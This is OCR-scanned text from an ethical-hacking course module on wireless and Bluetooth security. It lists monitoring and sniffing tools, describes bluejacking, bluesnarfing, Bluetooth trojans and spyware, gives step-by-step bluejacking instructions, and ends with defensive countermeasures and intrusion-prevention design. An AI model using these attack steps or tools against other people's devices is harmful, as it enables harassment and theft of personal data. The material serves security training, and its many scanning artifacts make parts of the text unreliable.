Radio frequency (RF) monitoring tools help in discovering and monitoring Wi-Fi networks. These tools help you to control and monitor network interfaces, including wireless ones. They allow you to see network activity and help you to control network interfaces in a convenient way. A list of RF monitoring tools follows: e 9 9 e 9 NetworkManager available at http://proiects.enome.org KWiFiManager available at http://kwifimanager.sourceforge.net NetworkControl available at http://www.arachnoid.com KOrinoco available at http://korinoco.sourceforge.net/ Sentry Edge II available at http://www.tek.com
Q WaveNode available at http://www.wavenode.com 9 Q 9 9 xosview available at http://xosview.sourceforge.net RF Monitor available at http://www.newsteo.com DTC-340 RFXpert available at http://www.dektec.com Home Curfew RF Monitoring System available at http://solutions.3m.com
Module 15 Page 2327
Wi-Fi Traffic Analyzer Tools

h ttp :/ / w w w .a r u b a n e t w o r k s .c o m
RFProtect Spectrum Analyzer p
CEH
h ttp :/ / u fa s o ft.c o m
Ufasoft Snif
h t tp :/ / w w w .flu k e n e t w o r k s .c o m
AirMagnet WiFi Analyzer
h ttp :/ / w w w .c a m b r id g e v x .c o m
vxSniffer
h t t p :/ / w w w .flu k e n e t w o r k s .c o m
OptiView XG Network Analysis Tablet
h ttp :/ / w w w .flu k e n e t w o r k s .c o m QHB C
OneTouch AT Network Assistant
h ttp :/ / w w w .ja v v in .c o m
Network Traffic Monitor 81 Analyzer CAPSA
h ttp :/ / w w w .c o la s o f t .c o m
Capsa Network Analyzer
h ttp :/ / w w w .n e t in s t.c o m
Observer
: ifnnl =IBB]
SoftPerfect Network Protocol Analyzer
W i-F i Traffic Analyzer Tools

Wi-Fi traffic analyzer tools analyze, debug, maintain, and monitor local networks and Internet connections for performance, bandwidth usage, and security issues. They capture data passing through your dial-up connection or network Ethernet card, analyze this data, and then represent it in an easily readable form. This type of tool is a useful tool for users who need a comprehensive picture of the traffic passing through their network connection or segment of a local area network. It analyzes the network traffic to trace specific transactions or find security breaches: 9 9 9 9 9 9 9 9 9 RFProtect Spectrum Analyzer available at http://www.arubanetworks.com AirMagnet WiFi Analyzer available at http://www.flukenetworks.com OptiView XG Network Analysis Tablet available at http://www.flukenetworks.com Network Traffic Monitor & Analyzer CAPSA available at http://www.iavvin.com Observer available at http://www.netinst.com Ufasoft Snif available at http://www.ufasoft.com vxSniffer available at http://www.cambridgevx.com OneTouch AT Network Assistant available at http://www.flukenetworks.com Capsa Network Analyzer available at http://www.colasoft.com
Module 15 Page 2328
SoftPerfect Network Protocol Analyzer available at http://www.softperfect.com
Module 15 Page 2329
Wi-Fi Raw Packet Capturing and Spectrum Analyzing Tools

Raw Packet C apturing Tools
CEH
Spectrum A nalyzing Tools

h ttp :/ / w w w .c is c o ,c o m
Cisco Spectrum Expert
lo
5
h ttp :/ / w w w .n ir s o ft.n e t
WirelessNetView
Tcpdump
J
h t t p :/ / w w w .t c p d u m p .o r g
h t t p :/ / w w w .flu k e n e t w o r k s .c o m
AirMedic USB
h ttp :/ / a ir v ie w .s o u r c e fo r g e .n e t
Airview
A
.
h t t p :/ / n u t s a b o u t n e t s .c o m
AirSleuth-Pro
h tt p :/ / w w w .n e t r e s e c .c o m
RawCap
M f \ 5 p i 1 5 ^
'
h ttp :/ / w w w .b v s y s t e m s .c o m
BumbleBee-LX Handheld Spectrum Analyzer
h t t p :/ / w w w .a ir c r a c k n g .o r g
Airodump-ng
(# )
h t tp :/ / w w w .m e ta g e e k .n e t
Wi-Spy
W i-Fi Raw Packet Capturing and Spectrum Analyzing Tools

R a w P a c k e t C a p t u r in g T o o ls Raw packet capturing tools capture wireless network packets, and help you to visually monitor WLAN packet activities. These tools for Wi-Fi capture everypacket on the air and support both Ethernet LAN and 802.11 and display network traffic at theMAClevel. A few of these types of tools are listed as follows: 9 9 9 9 WirelessNetView available at http://www.nirsoft.net Tcpdump available at http://www.tcpdump.org Airview available at http://airview.sourceforge.net RawCap available at http://www.netresec.com
Q Airodump-ng available at http://www.aircrack-ng.org
S p e c t r u m A n a ly z in g T o o ls Spectrum analyzing tools are specially designed for RF Spectrum Analysis and Wi-Fi
Module 15 Page 2330
Ethical Hacking and Countermeasures Copyright by EC-C0UllCil All Rights Reserved. Reproduction is Strictly Prohibited.
troubleshooting. With the help of these tools, users can detect any RF activity in the environment, including detecting areas where RF interference impacts performance ultimately resulting in user dissatisfaction due to slow connections or frequent disconnections. With this information, users can select the best channels for deploying Wi-Fi APs in the environment: 9 6 Cisco Spectrum Expert available at http://www.cisco.com AirMedic USB available at http://www.flukenetworks.com
Q AirSleuth-Pro available at http://nutsaboutnets.com Q BumbleBee-LX Handheld Spectrum Analyzer available at http://www.bvsvstems.com
Q Wi-Spy available at http://www.metageek.net
Module 15 Page 2331
Module Flow
CE H
M o d u l e F lo w
l!L Bluetooth is a Wi-Fi service that allows sharing files. Bluetooth hacking allows an attacker to gain information of host from another Bluetooth-enabled device without the host's permission. With this type of hacking, the attacker can steal information, delete contacts from the victim mobiles, and extract personal files/pictures, etc. The different types of Bluetooth attacks and the tools that are used for performing such attacks are explained in following slides.
Wireless Concepts
^*
Wireless Encryption
Wireless Threats
| j| | |
Bluetooth Hacking
Countermeasure H i
Module 15 Page 2332
Wi-Fi Pen Testing
Module 15 Page 2333
B lu e to o th H a c k in g
J Bluetooth hacking refers to exploitation of B lu eto o th stack im p lem entation vu lnerabilities to com prom ise sensitive data in Bluetooth-enabled devices and networks J Bluetooth enabled devices connect and com m unicate wirelessly through ad hoc networks known as Piconets
Bluesmacking
DoS attack which overflows Bluetooth-enabled devices with random packets causing the device to crash
Bluejacking
The art of sending unsolicited messages over Bluetooth to Bluetooth-enabled devices such as PDA and mobile phones
Blue Snarfing
The theft of information from a wireless device through a Bluetooth connection
BlueSniff
Proof of concept code for a Bluetooth wardriving utility
Copyright by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited.
B lu e to o th H a c k i n g
Bluetooth is a short-range wireless communication technology intended to replace the cables connecting portable or fixed devices while maintaining high levels of security. It allows mobile phones, computers, and other devices to exchange information using a shortrange wireless connection. Two Bluetooth-enabled devices connect through the pairing technique. There are some Bluetooth security issues that are vulnerable and make hijacking on Bluetooth devices possible. Bluetooth hacking refers to the exploitation of Bluetooth stack implementation vulnerabilities to compromise sensitive data in Bluetooth-enabled devices and networks. The following are Bluetooth device attacks:
B lu e j a c k in g
Bluejacking is the use of Bluetooth to send messages to users without the recipient's consent, similar to email spamming. Prior to any Bluetooth communication, the initiating device must provide a name that will be displayed on the recipient's screen. Because this name is userdefined, it can be set to be an annoying message or advertisement. Strictly speaking, Bluejacking does not cause any damage to the receiving device. It may, however, be irritating and disruptive to its victims.
B lu e S n if f
BlueSniff is proof of concept code for a Bluetooth wardriving utility. It is useful for finding hidden and discoverable Bluetooth devices. It operates on Linux.
Module 15 Page 2334
B lu e s m
a c k in g
A Bluesmacking attack is when an attacker sends an oversized ping packet to a victim's device. This causes a buffer overflow in the victim's device. This type of attack is similar to an ICMP ping of death.
B lu e s n a r f in g
Bluesnarfing is a method of gaining access to sensitive data in a Bluetooth-enabled device. If an attacker is within range of a target, he or she can use special software to obtain the data stored on the victim's device. To Bluesnarf, an attacker exploits a vulnerability in the protocol that Bluetooth uses to exchange information. This protocol is called Object Exchange (OBEX). The attacker connects with the target and performs a GET operation for files with correctly guessed or known names, such as /pb.vcf for the device's phonebook or telecom /cal.vcs for the device's calendar file.
Module 15 Page 2335
B lu e to o th S ta c k
CEH
Bluetooth Modes
Discoverable modes
1. Discoverable: Sends inquiry responses to all inquiries 2. Limited discoverable: Visible for a certain period of time Non-discoverable: Never answers an inquiry scan
3. L2CAP
Pairing modes
1. Link Manager Audio 2. Baseband Pairable mode: Will pair upon request Non-pairable mode: Rejects every pairing request
Bluetooth Radio
B l u e t o o th S ta c k
A Bluetooth stack refers to an implementation of the Bluetooth protocol stack. It allows an inheritance application to work over Bluetooth. Using Atinav's OS abstraction layer, porting to any system is achieved. The Bluetooth stack is divided into: general purpose and embedded system.
B lu e t o o t h
o d e s
D is c o v e r a b le
o d e s
Basically, Bluetooth operates in three discoverable modes. They are: Q Discoverable: When Bluetooth devices are in discoverable mode, the devices are able to be seen by other Bluetooth-enabled devices. If a phone is trying to connect to another phone, the phone that is trying to establish the connection must look for a phone that is in "discoverable mode," otherwise the phone that is trying to initiate the connection will not be able to detect the other phone. Discoverable mode is necessary only while connecting to the device for the first time. Once the connection is saved, the phones know each other; therefore, discoverable mode is not necessary for lateral connection establishment.
Module 15 Page 2336
Limited discoverable: In limited discoverable mode, the Bluetooth devices are discoverable only for a limited period of time, for a specific event, or during temporary conditions. However, there is no HCI command to set a device directly into limited discoverable mode. It must be done indirectly. When a device is set to the limited discoverable mode, it filters out non-matched lACs and discovers itself only to those that matched. Non-discoverable: Setting the Bluetooth device to "non-discoverable" mode prevents the devices from appearing on the list during Bluetooth-enabled device search process. However, it is still visible to those users and devices who paired with the Bluetooth device previously or who are familiar with the MAC address of the Bluetooth.
P a ir in g M o d e s
[& .A1 9
There are two modes of pairing for Bluetooth devices. They are: Non-pairable mode: In non-pairable mode, a Bluetooth device rejects the pairing request sent by any device. Pairable mode: In pairable mode, the Bluetooth device accepts the pairing request upon request and establishes a connection with the pair requesting device.
HCI
o
o
Cl
Link Manager
Audio
t O
Baseband
a . / c
>
Bluetooth Radio
FIGURE 15.72: Bluetooth Stack
Module 15 Page 2337
B lu e to o th T h r e a ts
C EH
Leaking Calendars and Address Books

Attacker can steal user's personal information and can use it for malicious purposes
Rem ote Control

Hackers can remotely control a phone to make phone calls or connect to the Internet
Bugging Devices
Attacker could instruct the user to make a phone call to other phones without any user interaction. They could even record the user's conversation
Social Engineering
Attackers trick Bluetooth users to lower security or disable authentication for Bluetooth connections in order to pair with them and steal information
Sending SMS M essages

Terrorists could send false bomb threats to airlines using the phones of legitimate users
M alicious Code
Mobile phone worms can exploit a Bluetooth connection to replicate and spread itself
Causing Financial Losses

Hackers could send many MMS messages with an international user's phone, resulting in a high phone bill J
Protocol V ulnerabilities
Attackers exploit Bluetooth parings and communication protocols to steal data, make calls, send messages, conduct DoS attacks on a device, start phone spying, etc.
B lu e to o th T h r e a t s
Similar to wireless networks, Bluetooth devices also subject to various threats. Due to the security flaws in the Bluetooth technology, various Bluetooth threats can take place. The following are the threats to Bluetooth devices: 9 Leaking calendars and address books: An attacker can steal a user's personal information and can use it for malicious purposes. Bugging devices: An attacker could instruct the user to make a phone call to other phones without any user interaction. They could even record the user's conversation. Sending SMS messages: Terrorists could send false bomb threats to airlines using the phones of legitimate users. Causing financial losses: Hackers could send many MMS messages with an international user's phone, resulting in a high phone bill. Remote control: Hackers can remotely control a phone to make phone calls or connect to the Internet. Social engineering: Attackers trick Bluetooth users to lower security or disable authentication for Bluetooth connections in order to pair with them and steal information.
Module 15 Page 2338
Malicious code: Mobile phone worms can exploit a Bluetooth connection to replicate and spread. Protocol vulnerabilities: Attackers exploit Bluetooth parings and communication protocols to steal data, make calls, send messages, conduct DoS attacks on a device, start phone spying, etc.
Module 15 Page 2339
H o w to B lu e ja c k a V ic tim
CEH
Bluejacking is the activity of sending anonymous messages over Bluetooth to Bluetoothenabled devices such as PDAs, laptops, mobile phones, etc. via the O BEX protocol
Select an area with plenty of mobile users, like a cafe, shopping center, etc. Go to contacts in your address book (You can delete this contact entry later)
Create a new contact on your phone address book Enter the message into the name field Ex: "Would you like to go on a date with me?"
Save the new contact with the name text and without the telephone number Choose "send via Bluetooth". These searches for any Bluetooth device within range
Choose one phone from the list discovered by Bluetooth and send the contact You will get the message "card sent" and then listen for the SMS message tone of your victim's phone
J J
. J
c = c=! r U * = * J J
^= L.
II M l II III
Copyright by EG-C*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
H o w to B l u e j a c k a V ic tim
___ Bluejacking is "temporarily hijacking another person's cell phone by sending it an anonymous text message using the Bluetooth wireless networking system." The operating range for Bluetooth is 10 meters. Phones embedded with Bluetooth technology can search for other Bluetooth-integrated phones by sending messages to them. Bluejacking is a new term used to define the activity of sending anonymous messages to other Bluetooth-equipped devices via the OBEX protocol. Follow the steps mentioned as follows to Bluejack a victim or a device: STEP 1: Select an area with plenty of mobile users, like a cafe, shopping center, etc. Go to contacts in your address book. STEP 2: Create a new contact in your phone address book. Enter a message into the name field, e.g., "Would you like to go on a date with me?" (You can delete this contact entry later.) STEP 3: Save the new contact with the name text and without the telephone number. Choose "send via Bluetooth." This searches for any Bluetooth device within range. STEP 4: Choose one phone from the list discovered by Bluetooth and send the contact. You will get the message "card sent" and then listen for the SMS message tone of your victim's phone.
Module 15 Page 2340
Bluetooth H acking Tool: Super Bluetooth Hack

J J
J A Bluetooth Trojan when infected allows the attacker to control and read information from victim phone Uses Bluetooth AT commands to access/hack other Bluetooth-enabled phones Once infected, it enables attackers to read messages and contacts, change profile, manipulate ringtone, restart or switch off the phone, restore factory settings and make calls from a victim's phone
CEH
Copyright by EG-G(nncil. All Rights Reserved. Reproduction is Strictly Prohibited.
B lu e to o th H a c k i n g T o o l: S u p e r B lu e to o th H a c k
A Bluetooth Trojan, when infected, allows the attacker to control and read information from the victim's phone. It uses Bluetooth AT commands to access/hack other Bluetoothenabled phones. Once infected, it enables attackers to read messages and contacts, change profile, manipulate ringtone, restart or switch off the phone, restore factory settings, and make calls from a victim's phone. Super Bluetooth Hack is Mobile Bluetooth hacking software. The tool requires the victim to accept the Bluetooth connection first, but this is just a one-time procedure for pairing the phones. Then it doesn't require pairing the phones in the future.
Module 15 Page 2341
F IG U R E1 5 .7 2 :S u p e rB lu e to o th H a c ks c re e n s h o ts
Module 15 Page 2342
Bluetooth Hacking Tool: PhoneSnoop

PhoneSnoop is BlackBerry spyware that enables an attacker to remotely activate the microphone of a BlackBerry handheld and listen to sounds near or around it, PhoneSnoop is a component of Bugs - a proof-of-concept spyware toolkit
CEH
It exists solely to demonstrate the capabilities of a BlackBerry handheld when used to conduct surveillance on an individual It is purely a proof-of-concept application and does not possess the stealth or spyware features that could make it malicious
SED 0 1 1 :3 9P M
D o w n lo a d s
Name: Version:
V e n d o r:
PhoneSnoop
1.0
ZenConsult
The application w as successfully installed
Sizc:^
D o s c B fi
lit
C !
PhoneSnoop
B lu e to o th H a c k i n g T o o l: P h o n e S n o o p
PhoneSnoop is BlackBerry spyware that enables an attacker to remotely activate the microphone of a BlackBerry handheld and listen to sounds near or around it; PhoneSnoop is a component of Bugs, a proof-of-concept spyware toolkit. It exists solely to demonstrate the capabilities of a BlackBerry handheld when used to conduct surveillance on an individual. It is purely a proof-of-concept application and does not possess any of the stealth or spyware features that make it malicious.
(M O 011:39 PM
Downloads
N a m e : V ersion: V e n d or: S iz e : D e s c f C
P h o n e S n o o p* 1 .0 Z e n C o n s u lt M .O K B T h ea p p lic a tio nw a ss u c c e s s fu lly in s ta lle d . fijjH ( 0 K ) ( R u n _ _ _ _ _ _ _ _ _ _ _ _ 1
PhoneSnoop
F IG U R E 15.72: Ph o n eSn o o p screenshots
Module 15 Page 2343
Bluetooth H acking Tool: BlueScanner
CEH
}
A
Arjto Cen*;.t EtucScnmcr -Blurtcorh Device Discovery Ffca Help fik
A Bluetooth device discovery and vulnerability assessment tool for Windows

* pi
(Q O r lEA 3 2 9 Er5 D |
Bluetooth Device Information
lyc 0/25/031.CelUaPhcre 0> 2 10 7 ; sdp
8 1( &36
Discover Bluetooth devices type (phone, computer, keyboard, PDA, etc.), and the services that are advertised by the devices Records all information that can be gathered from the device, without attempting to authenticating with the remote device
CeMyFtwre(!)
rq l' I M 0 k 1 P C $ tf*t1 l
G "1 m IR 3 w 5 D P |
Lacla | *
( 1 1 A jd u 6 t***f1 l
COW I
Ik4 ) r11feavtftcc.n1 Per*-.,, aecx .5f 1ah(!1
aecx rirT M itf( (!!
CO M1 Vatw 3J v .w ill It I Ilnl*V W 1y Urkncwn
D r t t > 1 p 1 v * iw e r i> jr n N^PCSJl. U r k n c w n UrKncwn N tfM ik A c c tte P o h i

GEE'Ghcoc Pu8h CBEXFife
ri rt ,,n:U. ' <r.n (IJ S>**WLCiert(l) Mu e Payer | 1 J
H e d * 8 X1C 2 J
&IMMXESSII)
H 1 d n j.lh i c e *
N c fc ia S y r e M lS e r v e r SyncML 0rl ___ M m e P a u C T
Copyright by EC-ClllCil. All Rights Reserved. Reproduction is Strictly Prohibited.
B lu e to o th H a c k i n g T o o l: B l u e S c a n n e r
BlueScanner is a Bluetooth device discovery and vulnerability assessment tool for Windows XP. Aruba Networks BlueScanner is provided under the Aruba Software License. With a Bluetooth adapter, organizations can use BlueScanner to discover Bluetooth devices, their type (phone, computer, keyboard, PDA, etc.), and the services that are advertised by the devices. It will identify any discoverable devices within range and record all information that can be gathered from the device, without attempting to authenticate with the remote device. This information includes the device's "human friendly" name, unique address, type, time of discovery, time last seen, and any Service Discovery Protocol (SDP) information provided by the device.
Module 15 Page 2344
/A Aruba Networks BlueScanner Bluetooth Device Discovery File Configure Nftwrk [/ Apply Filter Last Seen
Now (1)
Filter *j
Mansge
Help
Loo
Sizzle ... (00:1EA3:29:EF:5D)
First Seen/LastSsen 10/25/10 at 17:16:35 (8) 10/25/10 al 17:17:38
Tipe/Flags Celular Phone
Location
None (I)
Bluetooth Device Information Sizzlei... (00:1EA3:29:EF:5D) General RawSDP
Type
Cellulai Phone (1)
Services
Dial-up networking (1) Nokia PC Suite (1) COM 1(1) Voice Gateway (1) Audio Gateway (1) Unknown (4) Netwoik Access Point Service (1) OBEX Hbjcct Push (1) OBEX r ile Transfer (1) Nokia SyncML Server (1) SyncML Client (1) Music-Player (1) Media 3layer (2) SIM ACCESS (1)
m
Advertised Services Dial-up networkng Nokia PC Suite COM 1 Voice Gateway
Audio Gateway
Unknown Unknown Unknown Network Acces: Point Service Unknown OBEX Obted Push OBEX Fie Trance*
N(Ai<j S y S a v e i
SyncML CSent Music-Ptavet
Hide Inactive Devices
F IG U R E 15.73: B lu eScan n e r screenshot
Module 15 Page 2345
B lu e to o th H a c k in g T o o ls
CEH
BTBrowser
f N http://wireless.klings.org
Blooover
http://trifinite.org
m %> H!
BH Bluejack
http://croozeus.com
|7
BTScanner
http://www.pentest.co.uk
Bluesnarfer
http://www.airdem on.net
4 ^ 0
CIHwBT
http://sourceforge.net
BTCrawler
http://www.silentservices.de
BT Audit
http://trifinite.org
Bluediving
^ 1 http://bluediving.sourceforge,net
BlueAlert
http://www.insecure.in
B lu e to o th H a c k i n g T o o ls
Bluetooth hacking tools allow attackers to extract as much information as possible from a Bluetooth device without the requirement to pair. These tools are used to scan for other visible devices in range and can perform a service query. A few tools used to perform Bluetooth hacking are listed as follows: 9 9 9 9 s 9 BTBrowser available at http://wireless.klings.org BH Bluejack available at http://croozeus.com Bluesnarfer available at http://www.airdemon.net BTCrawler available at http://www.silentservices.de Bluediving available at http://bluediving.sourceforge.net Blooover available at http://trifinite.org
Q BTScanner available at http://www.pentest.co.uk 9 9 9 CIHwBT available at http://sourceforge.net BT Audit available at http://trifinite.org BlueAlert available at http://www.insecure.in
Module 15 Page 2346
Module Flow
CE H
m
_______
M o d u l e F lo w
So far, we have discussed wireless concepts, wireless encryption, threats associated with wireless networks, hacking methodology, various wireless hacking tools, and Bluetooth hacking. All these concepts and tools help in hacking or penetrating a wireless network. Now we will go over the countermeasures that can help in patching the determined security loopholes. Countermeasures are the practice of using multiple security systems or technologies to prevent intrusions. This section is dedicated to countermeasures and the practices that can defend against various hacking techniques or methods.
Wireless Concepts
Wireless Threats
HI p
Wireless Encryption
Bluetooth Hacking
Module 15 Page 2347
Module 15 Page 2348
How to Defend Against Bluetooth Hacking

Use non-regular patterns as PIN keys while pairing a device. Use those key combinations which are non-sequential on the keypad
CEH
Keep BT in the disabled state, enable it only when needed and disable immediately after the intended task is completed
Always enable encryption when establishing BT connection to your PC
Keep the device in nondiscoverable (hidden) mode
Keep a check of all paired devices in the past from time to time and delete any paired device which you are not sure about
DO NOT accept any unknown and unexpected request for pairing your device
H o w to D e f e n d A g a i n s t B lu e to o th H a c k i n g
Even though security gaps are being filled periodically by the manufacturer and technologist, the following are some of the tips that a normal user should keep in mind and protect himself or herself away from an amateur BT hacker: e Keep BT in the disabled state; enable it only when needed and disable immediately after the intended task is completed. Keep the device in non-discoverable (hidden) mode. DO NOT accept any unknown and unexpected request for pairing your device. Keep a check of all paired devices in the past from time to time and delete any paired device which you are not sure about.
9 9 9
Q Always enable encryption when establishing BT connection to your PC. 9 Use non regular patterns as PIN keys while pairing a device. Use those key combinations that are non-sequential and non-obvious on the keypad.
Module 15 Page 2349
H o w to D e t e c t a n d B l o c k R o g u e A P
CEH
l*rtf**4 itfeul U.U.
Detecting Rogue A P
R F S c a n n in g
Re-purposed access points that do only packet capturing and analysis (RF sensors) are plugged in all over the wired network to detect and warn the WLAN administrator about any wireless devices operating in the area J
B locking Rogue AP
Deny wireless service to new clients by launching a denial-of-service attack (DoS) on the rogue AP Block the switch port to which AP is connected or manually locate the AP and pull it physically off the LAN
A P S c a n n in g
Access points that have the functionality of detecting neighboring APs operating in the nearby area will expose the data through its MIBS and web interface
U s in g W ire d S id e Inp u ts
Network management software uses this technique to detect rogue APs. This software detects devices connected in the LAN, including Telnet, SNMP, CDP (Cisco discovery protocol) using multiple protocols
Copyright by EC-GOIIIlCil. All Rights Reserved. Reproduction isStrictly
Prohibited.
H o w to D e t e c t a n d B lo c k R o g u e A P s
Detecting and blocking rogue access points are important tasks that need to be implemented to ensure the security of a wireless network and to protect the wireless network from being compromised.
D e t e c t in g R o g u e A P s
A rogue AP is one that is not authorized by the network administrator for operation. The problem associated with these rogue APs is that these APs don't conform to wireless security policies. This may enable an insecure open interface to the trusted network. There are various techniques available to detect rogue AP. Following are the techniques to detect rogue APs: RF scanning: Re-purposed access points that do only packet capturing and analysis (RF sensors) are plugged in all over the wired network to detect and warn the WLAN administrator about any wireless devices operating in the area. These sensors don't cover the dead zones. More sensors are needed to be added, to detect the access points placed in dead zones. Q AP scanning: Access points that have the functionality of detecting neighboring APs operating in the nearby area will expose the data through its MIBS and web interface.
Module 15 Page 2350
The drawback in this case is the ability of AP to discover neighboring devices is limited to certain extent. Q Using wired side inputs: Network management software uses this technique to detect rogue APs. This software detects devices connected in the LAN, including Telnet, SNMP, and CDP (Cisco discovery protocol) using multiple protocols. Irrespective of its physical location, APs present anywhere in the network can be discovered using this technique.
B lo c k in g R o g u e A P
If any rogue APs are found in a wireless LAN, then they have to be blocked immediately to avoid authorized users or clients from being associated with it. This can be done in two ways: 9 Deny wireless service to new clients by launching a denial-of-service attack (DoS) on the rogue AP
Block the switch port to which AP is connected or manually locate the AP and pull it physically off the LAN
FIGURE 15.74: Blocking Rogue AP
Module 15 Page 2351
W ire le s s S e c u rity L a y e rs
ItiVM itkxjl IU (M
c EH
RF Spectrum Security Wireless IDS
Per-Packet Authentication, Centralized Encryption
/B \
Vulnerabilities and Patches j
Wireless Signal Security
Connection Security
Data Protection
WPA2 and AES
T - r
Device Security
Network Protection
End-user Protection
Strong Authentication
Stateful Per User Firewalls
Copyright by IG-GOHCil. All Rights Reserved. Reproduction is Strictly Prohibited.
W ire le s s S e c u rity L a y e rs
A wireless security mechanism has six layers to ensure security related to various [jfe__ " issues. This layered approach increases the scope of preventing the attacker from compromising a network and also increases the possibility of attacker being caught easily. The following is the structure of wireless security layers: fa
RF Spectrum Security Wireless IDS
Vulnerabilities and Patches
Wireless Signal Security
Connection Security
Data Protection
WPA2 and AES
Device Security
Network Protection
End-user Protection
Strong Authentication
Stateful Per User Firewalls
F IG U R E 15.75: Stru ctu re of W ire le s s security layers
Module 15 Page 2352
Q Connection security: Per frame/packet authentication provides complete protection against "man-in-the-middle" attacks. It does not allow the attacker to sniff the data when two genuine users are communicating between each other thereby securing the connection. Q Device security: Both vulnerability and patch management are the important component of security infrastructure since, these two components detect and prevent vulnerabilities before they are actually misused and compromise the device security.
Q Wireless signal security: In wireless networks, continuous monitoring and managing of network and the RF spectrum within the environment identifies the threats and awareness capability. The Wireless Intrusion Detection System (WIDS) has the capability of analyzing and monitoring the RF spectrum. The unauthorized wireless devices that violate the security policies of the company can be detected by alarm generation. The activities such as increased bandwidth usage, RF interferences, and unknown rogue wireless access points etc. are the indications of the malicious network. With the help of these indications you can easily detect the malicious network and can maintain the wireless security. The attacks against the wireless network cannot be predicted. Continuous monitoring of the network is the only measure that can be used to prevent such attacks and secure the network. Network protection: Strong authentication ensures only authorized user to gain access to your network thereby protecting your network from attacker. Q Data protection: Data protection can be attained by encrypting the data with the help of the encryption algorithms such as WPA2 and AES.
Module 15 Page 2353
End-user protection: Even if the attacker is associated with the Aps, the personal firewalls installed on the end user system on the same WLAN prevents the attacker from accessing the files on an end-user device, thereby protects the end user.
Module 15 Page 2354
How to D efend A gainst W ireless Attacks

Configuration Best Practices
1
SSID Settings Best Practices
Change th e defau lt SSID a fte r W L A N configuration
S e t th e router access password and enab le firew all protection
Disable SSID broadcasts
Disable rem ote router login and w ireless adm inistration
Enable M AC Address filtering on yo u r access point or router
Enable encryption on access point and change passphrase often
H o w to D e f e n d A g a i n s t W i r e l e s s A t ta c k s
Besides using tools that monitor the security of a wireless network, users can follow some approaches to defend their networks against various threats and attacks. The following are some of the configured best practices for Wi-Fi that ensure WLAN security: e 9 9 9 Q Q Change the default SSID after WLAN configuration Set the router access password and enable firewall protection Disable SSID broadcasts Disable remote router login and wireless administration Enable MAC Address filtering on your access point or router Enable encryption on access point and change passphrase often
Module 15 Page 2355
Ethical Hacking and Countermeasures Copyright by EC-C0linCil All Rights Reserved. Reproduction is Strictly Prohibited.
How to Defend Against Wireless Attacks (C o n t d )

r Configuration Best Practices SSID Settings Best Practices 1 Authentication Best Practices
c EH
Itk M jl IlM h M
H |
keep certain default wireless messages from broadcasting the ID to everyone Do not use your SSID, company name, network name, or any string in passphrases firewall or packet filter in between the AP and the corporate
Limit the strength of the wireless network outside the bounds of your organization Check the wireless devices for Implement an additional technique for over wireless
Copyright by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited
H o w to D e f e n d A g a i n s t W i r e l e s s A t t a c k s ( C o n t d)
Wireless networks can be protected from various wireless attacks by changing the SSID settings to provide high-level security. The following are the ways to set the SSID settings that ensure WLAN security: 9 Use SSID cloaking to keep certain default wireless messages from broadcasting the ID to everyone Do not use your SSID, company name, network name, or any easy to guess string in passphrases Place a firewall or packet filter in between the AP and the corporate Intranet Limit the strength of the wireless network so it cannot be detected outside the bounds of your organization Check the wireless devices for configuration or setup problems regularly Implement a different technique for encrypting traffic, such as IPSec over wireless
9 9
9 9
Module 15 Page 2356
How to D ef end Against W ireless Attacks (coiitd)
Urtifwtf
C EH
ItkK Jl lUckM
Configuration Best Practices___
Authentication Best Practices
Setting strong authentication for Wi-Fi networks access can be a considered as a measure to defend the WLAN against wireless attacks. The following are the ways to set Wi-Fi authentication to the strongest level: e 9 9 9 Choose Wi-Fi Protected Access (WPA) instead of WEP Implement WPA2 Enterprise wherever possible Disable the network when not required Place wireless access points in a secured location
Keep drivers on all wireless equipment updated 9 Use a centralized server for authentication
Module 15 Page 2357
How to D efend A gainst W ireless Attacks (C on t d )
C EH
Many wireless defense techniques are adopted for protecting the network against wireless attacks and we have discussed them in a previous module. Using appropriate WIDS, RADIUS server and other security mechanisms at the right place can defend your wireless network from being attacked.
Module 15 Page 2358
Attacker
Disassociate Unauthorized Users
Disable Broadcast SSID
FIGURE 15.76: Defending against wireless attacks
Module 15 Page 2359
M o d u l e F lo w
Wireless security can be accomplished not only with manual methods but also with wireless security tools. The security tools combined with the manual methods make the WLAN more secure. This section is dedicated to wireless security tools and mechanisms.
Wireless Concepts
|E1 P
/
Wireless Encryption
Wireless Threats 6 Wireless Hacking Tools
Bluetooth Hacking
Countermeasure
Wireless Security Tools y S r d
Wi-Fi Pen Testing
Module 15 Page 2360
W ireless Intrusion Prevention System s

Airsnarf Attack Wireless intrusion prevention systems protect networks against wireless threats, and enable administrators to detect and prevent various network attacks
CEH
Chopchop Attack
Day-zero Attack
Device Probing
Rogue Iden and Con
Probing and Discov! Fragmentation Attack
Honeypot
MAC Spoofing
Fake DHCP Server
W i r e l e s s I n t r u s i o n P r e v e n t i o n S y s te m s
* j A wireless intrusion prevention system (WIPS) is a network device that monitors the radio spectrum for detecting access points (intrusion detection) without the permission of the hosts in nearby locations, and it can also implement countermeasures automatically. Wireless intrusion prevention systems protect networks against wireless threats, and enable administrators to detect and prevent various network attacks.
Module 15 Page 2361
Airsnarf Attack
Chopchop Attack
F Traffic
a r m o rin g
Day-zero Attack Netwoik Intrusion I Device Probing Rogue Idem and Con1
D e te ctio n
Unauthorized Association Fragmentation Attack
Probing and Network Discov
Location Tracking
Honeypot
ASLEAP Attack
W EP Crack
MITM Attack
MAC Spoofing
Fake DHCP Server
FIGURE 15.77: Wireless Intrusion Prevention Systems
Module 15 Page 2362
W ire le s s IP S D e p lo y m e n t
(rt1fw4
CEH
tlfcxjl HMbM
DMZ
Wi-Fi Intrusion Prevention System
W i r e l e s s IP S D e p l o y m e n t
A WIPS is made up of a number of components that work together to provide a unified security monitoring solution. Component functions in a Cisco's Wireless IPS Deployment: 9 Access Points in Monitor Mode: Provides constant channel scanning with attack detection and packet capture capabilities. Mobility Services Engine (running wireless IPS Service): The central point of alarm aggregation from all controllers and their respective wireless IPS Monitor Mode Access Points. Alarm information and forensic files are stored on the system for archival purposes. Local Mode Access Point(s): Provides wireless service to clients in addition to timesliced rogue and location scanning. Wireless LAN Controller(s): Forwards attack information from wireless IPS Monitor Mode Access Points to the MSE and distributes configuration parameters to APs. Wireless Control System: Provides the administrator the means to configure the wireless IPS Service on the MSE, push wireless IPS configurations to the controller, and set APs into wireless IPS Monitor mode. It is also used for viewing wireless IPS alarms, forensics, reporting, and accessing the threat encyclopedia.
Module 15 Page 2363
DMZ
O
Authentication _ . Database Server
W iF i
